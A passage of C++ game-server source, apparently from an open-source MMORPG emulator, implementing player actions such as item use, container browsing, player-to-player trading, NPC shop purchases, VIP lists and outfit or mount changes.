player->sendCancelMessage(RETURNVALUE_NOTPOSSIBLE); return; } Item* item = thing->getItem(); if (!item || item->isUseable() || item->getClientID() != spriteId) { player->sendCancelMessage(RETURNVALUE_CANNOTUSETHISOBJECT); return; } ReturnValue ret = g_actions->canUse(player, pos); if (ret != RETURNVALUE_NOERROR) { if (ret == RETURNVALUE_TOOFARAWAY) { std::vector<Direction> listDir; if (player->getPathTo(pos, listDir, 0, 1, true, true)) { 
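//too far away: walk towards the item first and retry the use
//as the next walk action task once the walk has finished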
g_dispatcher.addTask(createTask(std::bind(&Game::playerAutoWalk, this, player->getID(), std::move(listDir)))); SchedulerTask* task = createSchedulerTask(400, std::bind(&Game::playerUseItem, this, playerId, pos, stackPos, index, spriteId)); player->setNextWalkActionTask(task); return; } ret = RETURNVALUE_THEREISNOWAY; } player->sendCancelMessage(ret); return; } if (!player->canDoAction()) { uint32_t delay = player->getNextActionTime(); SchedulerTask* task = createSchedulerTask(delay, std::bind(&Game::playerUseItem, this, playerId, pos, stackPos, index, spriteId)); player->setNextActionTask(task); return; } player->resetIdleTime(); player->setNextActionTask(nullptr); g_actions->useItem(player, pos, index, item, isHotkey); } void Game::playerUseWithCreature(uint32_t playerId, const Position& fromPos, uint8_t fromStackPos, uint32_t creatureId, uint16_t spriteId) { Player* player = getPlayerByID(playerId); if (!player) { return; } Creature* creature = getCreatureByID(creatureId); if (!creature) { return; } if (!Position::areInRange<Map::maxClientViewportX - 1, Map::maxClientViewportY - 1, 0>(creature->getPosition(), player->getPosition())) { return; } bool isHotkey = (fromPos.x == 0xFFFF && fromPos.y == 0 && fromPos.z == 0); if (!g_config.getBoolean(ConfigManager::AIMBOT_HOTKEY_ENABLED)) { if (creature->getPlayer() || isHotkey) { player->sendCancelMessage(RETURNVALUE_DIRECTPLAYERSHOOT); return; } } Thing* thing = internalGetThing(player, fromPos, fromStackPos, spriteId, STACKPOS_USEITEM); if (!thing) { player->sendCancelMessage(RETURNVALUE_NOTPOSSIBLE); return; } Item* item = thing->getItem(); if (!item || !item->isUseable() || item->getClientID() != spriteId) { player->sendCancelMessage(RETURNVALUE_CANNOTUSETHISOBJECT); return; } Position toPos = creature->getPosition(); Position walkToPos = fromPos; ReturnValue ret = g_actions->canUse(player, fromPos); if (ret == RETURNVALUE_NOERROR) { ret = g_actions->canUse(player, toPos, item); if (ret == RETURNVALUE_TOOFARAWAY) { walkToPos = toPos; } } if (ret != RETURNVALUE_NOERROR) { if (ret == RETURNVALUE_TOOFARAWAY) { Position itemPos = fromPos; uint8_t itemStackPos = fromStackPos; if (fromPos.x != 0xFFFF && Position::areInRange<1, 1, 0>(fromPos, player->getPosition()) && !Position::areInRange<1, 1, 0>(fromPos, toPos)) { Item* moveItem = nullptr; ret = internalMoveItem(item->getParent(), player, INDEX_WHEREEVER, item, item->getItemCount(), &moveItem, 0, player, nullptr, &fromPos, &toPos); if (ret != RETURNVALUE_NOERROR) { player->sendCancelMessage(ret); return; } //changing the position since its now in the inventory of the player internalGetPosition(moveItem, itemPos, itemStackPos); } std::vector<Direction> listDir; if (player->getPathTo(walkToPos, listDir, 0, 1, true, true)) { g_dispatcher.addTask(createTask(std::bind(&Game::playerAutoWalk, this, player->getID(), std::move(listDir)))); SchedulerTask* task = createSchedulerTask(400, std::bind(&Game::playerUseWithCreature, this, playerId, itemPos, itemStackPos, creatureId, spriteId)); player->setNextWalkActionTask(task); } else { player->sendCancelMessage(RETURNVALUE_THEREISNOWAY); } return; } player->sendCancelMessage(ret); return; } if (!player->canDoAction()) { uint32_t delay = player->getNextActionTime(); SchedulerTask* task = createSchedulerTask(delay, std::bind(&Game::playerUseWithCreature, this, playerId, fromPos, fromStackPos, creatureId, spriteId)); player->setNextActionTask(task); return; } player->resetIdleTime(); player->setNextActionTask(nullptr); g_actions->useItemEx(player, fromPos, 
creature->getPosition(), creature->getParent()->getThingIndex(creature), item, isHotkey, creature); } void Game::playerCloseContainer(uint32_t playerId, uint8_t cid) { Player* player = getPlayerByID(playerId); if (!player) { return; } player->closeContainer(cid); player->sendCloseContainer(cid); } void Game::playerMoveUpContainer(uint32_t playerId, uint8_t cid) { Player* player = getPlayerByID(playerId); if (!player) { return; } Container* container = player->getContainerByID(cid); if (!container) { return; } Container* parentContainer = dynamic_cast<Container*>(container->getRealParent()); if (!parentContainer) { Tile* tile = container->getTile(); if (!tile) { return; } if (!g_events->eventPlayerOnBrowseField(player, tile->getPosition())) { return; } auto it = browseFields.find(tile); if (it == browseFields.end()) { parentContainer = new Container(tile); parentContainer->incrementReferenceCounter(); browseFields[tile] = parentContainer; g_scheduler.addEvent(createSchedulerTask(30000, std::bind(&Game::decreaseBrowseFieldRef, this, tile->getPosition()))); } else { parentContainer = it->second; } } player->addContainer(cid, parentContainer); player->sendContainer(cid, parentContainer, parentContainer->hasParent(), player->getContainerIndex(cid)); } void Game::playerUpdateContainer(uint32_t playerId, uint8_t cid) { Player* player = getPlayerByID(playerId); if (!player) { return; } Container* container = player->getContainerByID(cid); if (!container) { return; } player->sendContainer(cid, container, container->hasParent(), player->getContainerIndex(cid)); } void Game::playerRotateItem(uint32_t playerId, const Position& pos, uint8_t stackPos, const uint16_t spriteId) { Player* player = getPlayerByID(playerId); if (!player) { return; } Thing* thing = internalGetThing(player, pos, stackPos, 0, STACKPOS_TOPDOWN_ITEM); if (!thing) { return; } Item* item = thing->getItem(); if (!item || item->getClientID() != spriteId || !item->isRotatable() || item->hasAttribute(ITEM_ATTRIBUTE_UNIQUEID)) { player->sendCancelMessage(RETURNVALUE_NOTPOSSIBLE); return; } if (pos.x != 0xFFFF && !Position::areInRange<1, 1, 0>(pos, player->getPosition())) { std::vector<Direction> listDir; if (player->getPathTo(pos, listDir, 0, 1, true, true)) { g_dispatcher.addTask(createTask(std::bind(&Game::playerAutoWalk, this, player->getID(), std::move(listDir)))); SchedulerTask* task = createSchedulerTask(400, std::bind(&Game::playerRotateItem, this, playerId, pos, stackPos, spriteId)); player->setNextWalkActionTask(task); } else { player->sendCancelMessage(RETURNVALUE_THEREISNOWAY); } return; } uint16_t newId = Item::items[item->getID()].rotateTo; if (newId != 0) { transformItem(item, newId); } } void Game::playerWriteItem(uint32_t playerId, uint32_t windowTextId, const std::string& text) { Player* player = getPlayerByID(playerId); if (!player) { return; } uint16_t maxTextLength = 0; uint32_t internalWindowTextId = 0; Item* writeItem = player->getWriteItem(internalWindowTextId, maxTextLength); if (text.length() > maxTextLength || windowTextId != internalWindowTextId) { return; } if (!writeItem || writeItem->isRemoved()) { player->sendCancelMessage(RETURNVALUE_NOTPOSSIBLE); return; } Cylinder* topParent = writeItem->getTopParent(); Player* owner = dynamic_cast<Player*>(topParent); if (owner && owner != player) { player->sendCancelMessage(RETURNVALUE_NOTPOSSIBLE); return; } if (!Position::areInRange<1, 1, 0>(writeItem->getPosition(), player->getPosition())) { player->sendCancelMessage(RETURNVALUE_NOTPOSSIBLE); return; } for (auto 
creatureEvent : player->getCreatureEvents(CREATURE_EVENT_TEXTEDIT)) { if (!creatureEvent->executeTextEdit(player, writeItem, text)) { player->setWriteItem(nullptr); return; } } if (!text.empty()) { if (writeItem->getText() != text) { writeItem->setText(text); writeItem->setWriter(player->getName()); writeItem->setDate(time(nullptr)); } } else { writeItem->resetText(); writeItem->resetWriter(); writeItem->resetDate(); } uint16_t newId = Item::items[writeItem->getID()].writeOnceItemId; if (newId != 0) { transformItem(writeItem, newId); } player->setWriteItem(nullptr); } void Game::playerBrowseField(uint32_t playerId, const Position& pos) { Player* player = getPlayerByID(playerId); if (!player) { return; } const Position& playerPos = player->getPosition(); if (playerPos.z != pos.z) { player->sendCancelMessage(playerPos.z > pos.z ? RETURNVALUE_FIRSTGOUPSTAIRS : RETURNVALUE_FIRSTGODOWNSTAIRS); return; } if (!Position::areInRange<1, 1>(playerPos, pos)) { std::vector<Direction> listDir; if (player->getPathTo(pos, listDir, 0, 1, true, true)) { g_dispatcher.addTask(createTask(std::bind(&Game::playerAutoWalk, this, player->getID(), std::move(listDir)))); SchedulerTask* task = createSchedulerTask(400, std::bind( &Game::playerBrowseField, this, playerId, pos )); player->setNextWalkActionTask(task); } else { player->sendCancelMessage(RETURNVALUE_THEREISNOWAY); } return; } Tile* tile = map.getTile(pos); if (!tile) { return; } if (!g_events->eventPlayerOnBrowseField(player, pos)) { return; } Container* container; auto it = browseFields.find(tile); if (it == browseFields.end()) { container = new Container(tile); container->incrementReferenceCounter(); browseFields[tile] = container; g_scheduler.addEvent(createSchedulerTask(30000, std::bind(&Game::decreaseBrowseFieldRef, this, tile->getPosition()))); } else { container = it->second; } uint8_t dummyContainerId = 0xF - ((pos.x % 3) * 3 + (pos.y % 3)); Container* openContainer = player->getContainerByID(dummyContainerId); if (openContainer) { player->onCloseContainer(openContainer); player->closeContainer(dummyContainerId); } else { player->addContainer(dummyContainerId, container); player->sendContainer(dummyContainerId, container, false, 0); } } void Game::playerSeekInContainer(uint32_t playerId, uint8_t containerId, uint16_t index) { Player* player = getPlayerByID(playerId); if (!player) { return; } Container* container = player->getContainerByID(containerId); if (!container || !container->hasPagination()) { return; } if ((index % container->capacity()) != 0 || index >= container->size()) { return; } player->setContainerIndex(containerId, index); player->sendContainer(containerId, container, container->hasParent(), index); } void Game::playerUpdateHouseWindow(uint32_t playerId, uint8_t listId, uint32_t windowTextId, const std::string& text) { Player* player = getPlayerByID(playerId); if (!player) { return; } uint32_t internalWindowTextId; uint32_t internalListId; House* house = player->getEditHouse(internalWindowTextId, internalListId); if (house && house->canEditAccessList(internalListId, player) && internalWindowTextId == windowTextId && listId == 0) { house->setAccessList(internalListId, text); } player->setEditHouse(nullptr); } void Game::playerWrapItem(uint32_t playerId, const Position& position, uint8_t stackPos, const uint16_t spriteId) { Player* player = getPlayerByID(playerId); if (!player) { return; } Thing* thing = internalGetThing(player, position, stackPos, 0, STACKPOS_TOPDOWN_ITEM); if (!thing) { return; } Item* item = thing->getItem(); if 
(!item || item->getClientID() != spriteId || !item->hasAttribute(ITEM_ATTRIBUTE_WRAPID) || item->hasAttribute(ITEM_ATTRIBUTE_UNIQUEID)) { player->sendCancelMessage(RETURNVALUE_NOTPOSSIBLE); return; } if (position.x != 0xFFFF && !Position::areInRange<1, 1, 0>(position, player->getPosition())) { std::vector<Direction> listDir; if (player->getPathTo(position, listDir, 0, 1, true, true)) { g_dispatcher.addTask(createTask(std::bind(&Game::playerAutoWalk, this, player->getID(), std::move(listDir)))); SchedulerTask* task = createSchedulerTask(400, std::bind(&Game::playerWrapItem, this, playerId, position, stackPos, spriteId)); player->setNextWalkActionTask(task); } else { player->sendCancelMessage(RETURNVALUE_THEREISNOWAY); } return; } g_events->eventPlayerOnWrapItem(player, item); } void Game::playerRequestTrade(uint32_t playerId, const Position& pos, uint8_t stackPos, uint32_t tradePlayerId, uint16_t spriteId) { Player* player = getPlayerByID(playerId); if (!player) { return; } Player* tradePartner = getPlayerByID(tradePlayerId); if (!tradePartner || tradePartner == player) { player->sendCancelMessage("Select a player to trade with."); return; } if (!Position::areInRange<2, 2, 0>(tradePartner->getPosition(), player->getPosition())) { player->sendCancelMessage(RETURNVALUE_DESTINATIONOUTOFREACH); return; } if (!canThrowObjectTo(tradePartner->getPosition(), player->getPosition(), true, true)) { player->sendCancelMessage(RETURNVALUE_CANNOTTHROW); return; } Thing* tradeThing = internalGetThing(player, pos, stackPos, 0, STACKPOS_TOPDOWN_ITEM); if (!tradeThing) { player->sendCancelMessage(RETURNVALUE_NOTPOSSIBLE); return; } Item* tradeItem = tradeThing->getItem(); if (tradeItem->getClientID() != spriteId || !tradeItem->isPickupable() || tradeItem->hasAttribute(ITEM_ATTRIBUTE_UNIQUEID)) { player->sendCancelMessage(RETURNVALUE_NOTPOSSIBLE); return; } if (g_config.getBoolean(ConfigManager::ONLY_INVITED_CAN_MOVE_HOUSE_ITEMS)) { if (HouseTile* houseTile = dynamic_cast<HouseTile*>(tradeItem->getTile())) { House* house = houseTile->getHouse(); if (house && !house->isInvited(player)) { player->sendCancelMessage(RETURNVALUE_NOTPOSSIBLE); return; } } } const Position& playerPosition = player->getPosition(); const Position& tradeItemPosition = tradeItem->getPosition(); if (playerPosition.z != tradeItemPosition.z) { player->sendCancelMessage(playerPosition.z > tradeItemPosition.z ? 
RETURNVALUE_FIRSTGOUPSTAIRS : RETURNVALUE_FIRSTGODOWNSTAIRS); return; } if (!Position::areInRange<1, 1>(tradeItemPosition, playerPosition)) { std::vector<Direction> listDir; if (player->getPathTo(pos, listDir, 0, 1, true, true)) { g_dispatcher.addTask(createTask(std::bind(&Game::playerAutoWalk, this, player->getID(), std::move(listDir)))); SchedulerTask* task = createSchedulerTask(400, std::bind(&Game::playerRequestTrade, this, playerId, pos, stackPos, tradePlayerId, spriteId)); player->setNextWalkActionTask(task); } else { player->sendCancelMessage(RETURNVALUE_THEREISNOWAY); } return; } Container* tradeItemContainer = tradeItem->getContainer(); if (tradeItemContainer) { for (const auto& it : tradeItems) { Item* item = it.first; if (tradeItem == item) { player->sendCancelMessage("This item is already being traded."); return; } if (tradeItemContainer->isHoldingItem(item)) { player->sendCancelMessage("This item is already being traded."); return; } Container* container = item->getContainer(); if (container && container->isHoldingItem(tradeItem)) { player->sendCancelMessage("This item is already being traded."); return; } } } else { for (const auto& it : tradeItems) { Item* item = it.first; if (tradeItem == item) { player->sendCancelMessage("This item is already being traded."); return; } Container* container = item->getContainer(); if (container && container->isHoldingItem(tradeItem)) { player->sendCancelMessage("This item is already being traded."); return; } } } Container* tradeContainer = tradeItem->getContainer(); if (tradeContainer && tradeContainer->getItemHoldingCount() + 1 > 100) { player->sendCancelMessage("You can only trade up to 100 objects at once."); return; } if (!g_events->eventPlayerOnTradeRequest(player, tradePartner, tradeItem)) { return; } internalStartTrade(player, tradePartner, tradeItem); } bool Game::internalStartTrade(Player* player, Player* tradePartner, Item* tradeItem) { if (player->tradeState != TRADE_NONE && !(player->tradeState == TRADE_ACKNOWLEDGE && player->tradePartner == tradePartner)) { player->sendCancelMessage(RETURNVALUE_YOUAREALREADYTRADING); return false; } else if (tradePartner->tradeState != TRADE_NONE && tradePartner->tradePartner != player) { player->sendCancelMessage(RETURNVALUE_THISPLAYERISALREADYTRADING); return false; } player->tradePartner = tradePartner; player->tradeItem = tradeItem; player->tradeState = TRADE_INITIATED; tradeItem->incrementReferenceCounter(); tradeItems[tradeItem] = player->getID(); player->sendTradeItemRequest(player->getName(), tradeItem, true); if (tradePartner->tradeState == TRADE_NONE) { tradePartner->sendTextMessage(MESSAGE_EVENT_ADVANCE, fmt::format("{:s} wants to trade with you.", player->getName())); tradePartner->tradeState = TRADE_ACKNOWLEDGE; tradePartner->tradePartner = player; } else { Item* counterOfferItem = tradePartner->tradeItem; player->sendTradeItemRequest(tradePartner->getName(), counterOfferItem, false); tradePartner->sendTradeItemRequest(player->getName(), tradeItem, false); } return true; } void Game::playerAcceptTrade(uint32_t playerId) { Player* player = getPlayerByID(playerId); if (!player) { return; } if (!(player->getTradeState() == TRADE_ACKNOWLEDGE || player->getTradeState() == TRADE_INITIATED)) { return; } Player* tradePartner = player->tradePartner; if (!tradePartner) { return; } player->setTradeState(TRADE_ACCEPT); if (tradePartner->getTradeState() == TRADE_ACCEPT) { if (!canThrowObjectTo(tradePartner->getPosition(), player->getPosition(), true, true)) { internalCloseTrade(player, false); 
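//abort the trade without the default "Trade cancelled." message and tell
//both parties that the partner is out of throwing range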
player->sendCancelMessage(RETURNVALUE_CANNOTTHROW); tradePartner->sendCancelMessage(RETURNVALUE_CANNOTTHROW); return; } Item* playerTradeItem = player->tradeItem; Item* partnerTradeItem = tradePartner->tradeItem; if (!g_events->eventPlayerOnTradeAccept(player, tradePartner, playerTradeItem, partnerTradeItem)) { internalCloseTrade(player, false); return; } player->setTradeState(TRADE_TRANSFER); tradePartner->setTradeState(TRADE_TRANSFER); auto it = tradeItems.find(playerTradeItem); if (it != tradeItems.end()) { ReleaseItem(it->first); tradeItems.erase(it); } it = tradeItems.find(partnerTradeItem); if (it != tradeItems.end()) { ReleaseItem(it->first); tradeItems.erase(it); } bool isSuccess = false; ReturnValue tradePartnerRet = RETURNVALUE_NOERROR; ReturnValue playerRet = RETURNVALUE_NOERROR; // if player is trying to trade its own backpack if (tradePartner->getInventoryItem(CONST_SLOT_BACKPACK) == partnerTradeItem) { tradePartnerRet = (tradePartner->getInventoryItem(getSlotType(Item::items[playerTradeItem->getID()])) ? RETURNVALUE_NOTENOUGHROOM : RETURNVALUE_NOERROR); } if (player->getInventoryItem(CONST_SLOT_BACKPACK) == playerTradeItem) { playerRet = (player->getInventoryItem(getSlotType(Item::items[partnerTradeItem->getID()])) ? RETURNVALUE_NOTENOUGHROOM : RETURNVALUE_NOERROR); } if (tradePartnerRet == RETURNVALUE_NOERROR && playerRet == RETURNVALUE_NOERROR) { tradePartnerRet = internalAddItem(tradePartner, playerTradeItem, INDEX_WHEREEVER, 0, true); playerRet = internalAddItem(player, partnerTradeItem, INDEX_WHEREEVER, 0, true); if (tradePartnerRet == RETURNVALUE_NOERROR && playerRet == RETURNVALUE_NOERROR) { playerRet = internalRemoveItem(playerTradeItem, playerTradeItem->getItemCount(), true); tradePartnerRet = internalRemoveItem(partnerTradeItem, partnerTradeItem->getItemCount(), true); if (tradePartnerRet == RETURNVALUE_NOERROR && playerRet == RETURNVALUE_NOERROR) { tradePartnerRet = internalMoveItem(playerTradeItem->getParent(), tradePartner, INDEX_WHEREEVER, playerTradeItem, playerTradeItem->getItemCount(), nullptr, FLAG_IGNOREAUTOSTACK, nullptr, partnerTradeItem); if (tradePartnerRet == RETURNVALUE_NOERROR) { internalMoveItem(partnerTradeItem->getParent(), player, INDEX_WHEREEVER, partnerTradeItem, partnerTradeItem->getItemCount(), nullptr, FLAG_IGNOREAUTOSTACK); playerTradeItem->onTradeEvent(ON_TRADE_TRANSFER, tradePartner); partnerTradeItem->onTradeEvent(ON_TRADE_TRANSFER, player); isSuccess = true; } } } } if (!isSuccess) { std::string errorDescription; if (tradePartner->tradeItem) { errorDescription = getTradeErrorDescription(tradePartnerRet, playerTradeItem); tradePartner->sendTextMessage(MESSAGE_EVENT_ADVANCE, errorDescription); tradePartner->tradeItem->onTradeEvent(ON_TRADE_CANCEL, tradePartner); } if (player->tradeItem) { errorDescription = getTradeErrorDescription(playerRet, partnerTradeItem); player->sendTextMessage(MESSAGE_EVENT_ADVANCE, errorDescription); player->tradeItem->onTradeEvent(ON_TRADE_CANCEL, player); } } g_events->eventPlayerOnTradeCompleted(player, tradePartner, playerTradeItem, partnerTradeItem, isSuccess); player->setTradeState(TRADE_NONE); player->tradeItem = nullptr; player->tradePartner = nullptr; player->sendTradeClose(); tradePartner->setTradeState(TRADE_NONE); tradePartner->tradeItem = nullptr; tradePartner->tradePartner = nullptr; tradePartner->sendTradeClose(); } } std::string Game::getTradeErrorDescription(ReturnValue ret, Item* item) { if (item) { if (ret == RETURNVALUE_NOTENOUGHCAPACITY) { return fmt::format("You do not have enough capacity 
to carry {:s}.\n {:s}", item->isStackable() && item->getItemCount() > 1 ? "these objects" : "this object", item->getWeightDescription()); } else if (ret == RETURNVALUE_NOTENOUGHROOM || ret == RETURNVALUE_CONTAINERNOTENOUGHROOM) { return fmt::format("You do not have enough room to carry {:s}.", item->isStackable() && item->getItemCount() > 1 ? "these objects" : "this object"); } } return "Trade could not be completed."; } void Game::playerLookInTrade(uint32_t playerId, bool lookAtCounterOffer, uint8_t index) { Player* player = getPlayerByID(playerId); if (!player) { return; } Player* tradePartner = player->tradePartner; if (!tradePartner) { return; } Item* tradeItem; if (lookAtCounterOffer) { tradeItem = tradePartner->getTradeItem(); } else { tradeItem = player->getTradeItem(); } if (!tradeItem) { return; } const Position& playerPosition = player->getPosition(); const Position& tradeItemPosition = tradeItem->getPosition(); int32_t lookDistance = std::max<int32_t>(Position::getDistanceX(playerPosition, tradeItemPosition), Position::getDistanceY(playerPosition, tradeItemPosition)); if (index == 0) { g_events->eventPlayerOnLookInTrade(player, tradePartner, tradeItem, lookDistance); return; } Container* tradeContainer = tradeItem->getContainer(); if (!tradeContainer) { return; } std::vector<const Container*> containers {tradeContainer}; size_t i = 0; while (i < containers.size()) { const Container* container = containers[i++]; for (Item* item : container->getItemList()) { Container* tmpContainer = item->getContainer(); if (tmpContainer) { containers.push_back(tmpContainer); } if (--index == 0) { g_events->eventPlayerOnLookInTrade(player, tradePartner, item, lookDistance); return; } } } } void Game::playerCloseTrade(uint32_t playerId) { Player* player = getPlayerByID(playerId); if (!player) { return; } internalCloseTrade(player); } void Game::internalCloseTrade(Player* player, bool sendCancel/* = true*/) { Player* tradePartner = player->tradePartner; if ((tradePartner && tradePartner->getTradeState() == TRADE_TRANSFER) || player->getTradeState() == TRADE_TRANSFER) { return; } if (player->getTradeItem()) { auto it = tradeItems.find(player->getTradeItem()); if (it != tradeItems.end()) { ReleaseItem(it->first); tradeItems.erase(it); } player->tradeItem->onTradeEvent(ON_TRADE_CANCEL, player); player->tradeItem = nullptr; } player->setTradeState(TRADE_NONE); player->tradePartner = nullptr; if (sendCancel) { player->sendTextMessage(MESSAGE_STATUS_SMALL, "Trade cancelled."); } player->sendTradeClose(); if (tradePartner) { if (tradePartner->getTradeItem()) { auto it = tradeItems.find(tradePartner->getTradeItem()); if (it != tradeItems.end()) { ReleaseItem(it->first); tradeItems.erase(it); } tradePartner->tradeItem->onTradeEvent(ON_TRADE_CANCEL, tradePartner); tradePartner->tradeItem = nullptr; } tradePartner->setTradeState(TRADE_NONE); tradePartner->tradePartner = nullptr; if (sendCancel) { tradePartner->sendTextMessage(MESSAGE_STATUS_SMALL, "Trade cancelled."); } tradePartner->sendTradeClose(); } } void Game::playerPurchaseItem(uint32_t playerId, uint16_t spriteId, uint8_t count, uint8_t amount, bool ignoreCap/* = false*/, bool inBackpacks/* = false*/) { if (amount == 0 || amount > 100) { return; } Player* player = getPlayerByID(playerId); if (!player) { return; } int32_t onBuy, onSell; Npc* merchant = player->getShopOwner(onBuy, onSell); if (!merchant) { return; } const ItemType& it = Item::items.getItemIdByClientId(spriteId); if (it.id == 0) { return; } uint8_t subType; if (it.isSplash() || 
it.isFluidContainer()) { subType = clientFluidToServer(count); } else { subType = count; } if (!player->hasShopItemForSale(it.id, subType)) { return; } merchant->onPlayerTrade(player, onBuy, it.id, subType, amount, ignoreCap, inBackpacks); } void Game::playerSellItem(uint32_t playerId, uint16_t spriteId, uint8_t count, uint8_t amount, bool ignoreEquipped) { if (amount == 0 || amount > 100) { return; } Player* player = getPlayerByID(playerId); if (!player) { return; } int32_t onBuy, onSell; Npc* merchant = player->getShopOwner(onBuy, onSell); if (!merchant) { return; } const ItemType& it = Item::items.getItemIdByClientId(spriteId); if (it.id == 0) { return; } uint8_t subType; if (it.isSplash() || it.isFluidContainer()) { subType = clientFluidToServer(count); } else { subType = count; } merchant->onPlayerTrade(player, onSell, it.id, subType, amount, ignoreEquipped); } void Game::playerCloseShop(uint32_t playerId) { Player* player = getPlayerByID(playerId); if (!player) { return; } player->closeShopWindow(); } void Game::playerLookInShop(uint32_t playerId, uint16_t spriteId, uint8_t count) { Player* player = getPlayerByID(playerId); if (!player) { return; } int32_t onBuy, onSell; Npc* merchant = player->getShopOwner(onBuy, onSell); if (!merchant) { return; } const ItemType& it = Item::items.getItemIdByClientId(spriteId); if (it.id == 0) { return; } int32_t subType; if (it.isFluidContainer() || it.isSplash()) { subType = clientFluidToServer(count); } else { subType = count; } if (!player->hasShopItemForSale(it.id, subType)) { return; } const std::string& description = Item::getDescription(it, 1, nullptr, subType); g_events->eventPlayerOnLookInShop(player, &it, subType, description); } void Game::playerLookAt(uint32_t playerId, const Position& pos, uint8_t stackPos) { Player* player = getPlayerByID(playerId); if (!player) { return; } Thing* thing = internalGetThing(player, pos, stackPos, 0, STACKPOS_LOOK); if (!thing) { player->sendCancelMessage(RETURNVALUE_NOTPOSSIBLE); return; } Position thingPos = thing->getPosition(); if (!player->canSee(thingPos)) { player->sendCancelMessage(RETURNVALUE_NOTPOSSIBLE); return; } Position playerPos = player->getPosition(); int32_t lookDistance; if (thing != player) { lookDistance = std::max<int32_t>(Position::getDistanceX(playerPos, thingPos), Position::getDistanceY(playerPos, thingPos)); if (playerPos.z != thingPos.z) { lookDistance += 15; } } else { lookDistance = -1; } g_events->eventPlayerOnLook(player, pos, thing, stackPos, lookDistance); } void Game::playerLookInBattleList(uint32_t playerId, uint32_t creatureId) { Player* player = getPlayerByID(playerId); if (!player) { return; } Creature* creature = getCreatureByID(creatureId); if (!creature) { return; } if (!player->canSeeCreature(creature)) { return; } const Position& creaturePos = creature->getPosition(); if (!player->canSee(creaturePos)) { return; } int32_t lookDistance; if (creature != player) { const Position& playerPos = player->getPosition(); lookDistance = std::max<int32_t>(Position::getDistanceX(playerPos, creaturePos), Position::getDistanceY(playerPos, creaturePos)); if (playerPos.z != creaturePos.z) { lookDistance += 15; } } else { lookDistance = -1; } g_events->eventPlayerOnLookInBattleList(player, creature, lookDistance); } void Game::playerCancelAttackAndFollow(uint32_t playerId) { Player* player = getPlayerByID(playerId); if (!player) { return; } playerSetAttackedCreature(playerId, 0); playerFollowCreature(playerId, 0); player->stopWalk(); } void Game::playerSetAttackedCreature(uint32_t 
playerId, uint32_t creatureId) { Player* player = getPlayerByID(playerId); if (!player) { return; } if (player->getAttackedCreature() && creatureId == 0) { player->setAttackedCreature(nullptr); player->sendCancelTarget(); return; } Creature* attackCreature = getCreatureByID(creatureId); if (!attackCreature) { player->setAttackedCreature(nullptr); player->sendCancelTarget(); return; } ReturnValue ret = Combat::canTargetCreature(player, attackCreature); if (ret != RETURNVALUE_NOERROR) { player->sendCancelMessage(ret); player->sendCancelTarget(); player->setAttackedCreature(nullptr); return; } player->setAttackedCreature(attackCreature); g_dispatcher.addTask(createTask(std::bind(&Game::updateCreatureWalk, this, player->getID()))); } void Game::playerFollowCreature(uint32_t playerId, uint32_t creatureId) { Player* player = getPlayerByID(playerId); if (!player) { return; } player->setAttackedCreature(nullptr); g_dispatcher.addTask(createTask(std::bind(&Game::updateCreatureWalk, this, player->getID()))); player->setFollowCreature(getCreatureByID(creatureId)); } void Game::playerSetFightModes(uint32_t playerId, fightMode_t fightMode, bool chaseMode, bool secureMode) { Player* player = getPlayerByID(playerId); if (!player) { return; } player->setFightMode(fightMode); player->setChaseMode(chaseMode); player->setSecureMode(secureMode); } void Game::playerRequestAddVip(uint32_t playerId, const std::string& name) { if (name.length() > 20) { return; } Player* player = getPlayerByID(playerId); if (!player) { return; } Player* vipPlayer = getPlayerByName(name); if (!vipPlayer) { uint32_t guid; bool specialVip; std::string formattedName = name; if (!IOLoginData::getGuidByNameEx(guid, specialVip, formattedName)) { player->sendTextMessage(MESSAGE_STATUS_SMALL, "A player with this name does not exist."); return; } if (specialVip && !player->hasFlag(PlayerFlag_SpecialVIP)) { player->sendTextMessage(MESSAGE_STATUS_SMALL, "You can not add this player."); return; } player->addVIP(guid, formattedName, VIPSTATUS_OFFLINE); } else { if (vipPlayer->hasFlag(PlayerFlag_SpecialVIP) && !player->hasFlag(PlayerFlag_SpecialVIP)) { player->sendTextMessage(MESSAGE_STATUS_SMALL, "You can not add this player."); return; } if (!vipPlayer->isInGhostMode() || player->canSeeGhostMode(vipPlayer)) { player->addVIP(vipPlayer->getGUID(), vipPlayer->getName(), VIPSTATUS_ONLINE); } else { player->addVIP(vipPlayer->getGUID(), vipPlayer->getName(), VIPSTATUS_OFFLINE); } } } void Game::playerRequestRemoveVip(uint32_t playerId, uint32_t guid) { Player* player = getPlayerByID(playerId); if (!player) { return; } player->removeVIP(guid); } void Game::playerRequestEditVip(uint32_t playerId, uint32_t guid, const std::string& description, uint32_t icon, bool notify) { Player* player = getPlayerByID(playerId); if (!player) { return; } player->editVIP(guid, description, icon, notify); } void Game::playerTurn(uint32_t playerId, Direction dir) { Player* player = getPlayerByID(playerId); if (!player) { return; } if (!g_events->eventPlayerOnTurn(player, dir)) { return; } player->resetIdleTime(); internalCreatureTurn(player, dir); } void Game::playerRequestOutfit(uint32_t playerId) { if (!g_config.getBoolean(ConfigManager::ALLOW_CHANGEOUTFIT)) { return; } Player* player = getPlayerByID(playerId); if (!player) { return; } player->sendOutfitWindow(); } void Game::playerToggleMount(uint32_t playerId, bool mount) { Player* player = getPlayerByID(playerId); if (!player) { return; } player->toggleMount(mount); } void Game::playerChangeOutfit(uint32_t playerId, 
Outfit_t outfit) { if (!g_config.getBoolean(ConfigManager::ALLOW_CHANGEOUTFIT)) { return; } Player* player = getPlayerByID(playerId); if (!player) { return; } const Outfit* playerOutfit = Outfits::getInstance().getOutfitByLookType(player->getSex(), outfit.lookType); if (!playerOutfit) { outfit.lookMount = 0; } if (outfit.lookMount != 0) { Mount* mount = mounts.getMountByClientID(outfit.lookMount); if (!mount) { return; } if (!player->hasMount(mount)) { return; } if (player->isMounted()) { Mount* prevMount = mounts.getMountByID(player->getCurrentMount()); if (prevMount) { changeSpeed(player, mount->speed - prevMount->speed); } player->setCurrentMount(mount->id); } else { player->setCurrentMount(mount->id); outfit.lookMount = 0; } } else if (player->isMounted()) { player->dismount(); } if (player->canWear(outfit.lookType, outfit.lookAddons)) { player->defaultOutfit = outfit; if (player->hasCondition(CONDITION_OUTFIT)) { return; } internalCreatureChangeOutfit(player, outfit); } } void Game::playerShowQuestLog(uint32_t playerId) { Player* player = getPlayerByID(playerId); if (!player) { return; } player->sendQuestLog(); } void Game::playerShowQuestLine(uint32_t playerId, uint16_t questId) { Player* player = getPlayerByID(playerId); if (!player) { return; } Quest* quest = quests.getQuestByID(questId); if (!quest) { return; } player->sendQuestLine(quest); } void Game::playerSay(uint32_t playerId, uint16_t channelId, SpeakClasses type, const std::string& 